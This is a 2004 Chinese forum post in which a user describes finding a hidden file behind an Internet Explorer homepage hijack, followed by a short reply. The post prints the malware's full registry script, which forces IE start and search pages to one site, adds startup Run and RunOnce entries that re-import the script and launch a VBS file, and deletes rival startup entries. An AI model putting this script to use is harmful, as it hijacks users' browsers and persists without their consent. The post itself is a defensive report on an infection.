1. 文学城
  2. [computer]

它偷偷修改了我的IE主页 抓到一个特务2004-01-05 14:38:00

抓到一个特务2004-01-05 14:38:00
见天打开电脑,看到主页被修改了,REGEDIT导出注册表后,用XP的恢复功能,恢复成功。
研究导出的文件,抓到一个特务

C:$NtUninstallQ887678$WINSYS2.cer"
我在REGEDIT里抓到了它的尾巴,在WINDOWS里根本看不到他,
退到DOS下,找到了这个文件,打开一看是个注册表文件
内容如下:



REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer]
"SearchURL"="http://www.eachz.com/"

[HKEY_USERS.DefaultSoftwareMicrosoftInternet Explorer]
"SearchURL"="http://www.eachz.com/"

[HKEY_USERS.DefaultSoftwareMicrosoftInternet ExplorerMain]
"Search Page"="http://www.eachz.com/"
"Default_Search_URL"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"

[HKEY_USERS.DefaultSoftwareMicrosoftInternet ExplorerSearch]
"SearchAssistant"="http://www.eachz.com/"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
"Start Page"="http://www.eachz.com/"
"First Home Page"="http://www.eachz.com/"
"Default_Search_URL"="http://www.eachz.com/"
"Search Page"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"
"Local Page"="http://www.eachz.com/"

[-HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]
[HKEY_CURRENT_USERSoftwareMicrosoftwindowsCurrentVersionRun]
@="regedit -s C:$NtUninstallQ887678$WINSYS2.cer"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
"Default_Page_URL"="http://www.eachz.com/"

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"Default_Search_URL"="http://www.eachz.com/"
"Search Page"="http://www.eachz.com/"
"Search Bar"="http://www.eachz.com/"
"SearchURL"="http://www.eachz.com/"
"Start Page"="http://www.eachz.com/"
"First Home Page"="http://www.eachz.com/"
"Default_Page_URL"="http://www.eachz.com/"
"Local Page"="http://www.eachz.com/"

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"WlN32"="C:$NtUninstallQ887678$WINSYS.vbs"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"WlN32"="regedit -s C:$NtUninstallQ887678$WINSYS2.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-




--文学城www.wenxuecity.com--
战火里2004-01-05 22:04:00
从注册表中删除了那个网站。但找不到C下的文件夹。于是系统恢复
继续阅读
我的MSN怎么一开机就自动LOG IN 了?当我SIGN问题??//   2004-01-05 13:42:00how to romove ripper trojan?todayzee   2004-01-05 11:26:00再问高手:total recorder破解版65秒后有杂音?mycash   2004-01-05 09:59:00请 教ropytest   2004-01-05 08:05:00想买笔记本电脑请推荐   2004-01-05 07:05:00主页被恶意修改,改不回了,咋办呢?注册表我看不懂,太高深了。战火里   2004-01-05 06:26:00Lost important data on CD-RW救命阿   2004-01-05 06:20:00Great Plains StandardWiling2Pay   2004-01-05 04:59:00讨论一下PAYPAL的安全性--如何防止PAYPAL欺诈bmw325i   2004-01-05 04:46:00以后买贵重东西一定先当场打开看看bmw325i   2004-01-05 04:34:00
同作者
它偷偷修改了我的IE主页抓到一个特务   2004-01-05 14:38:00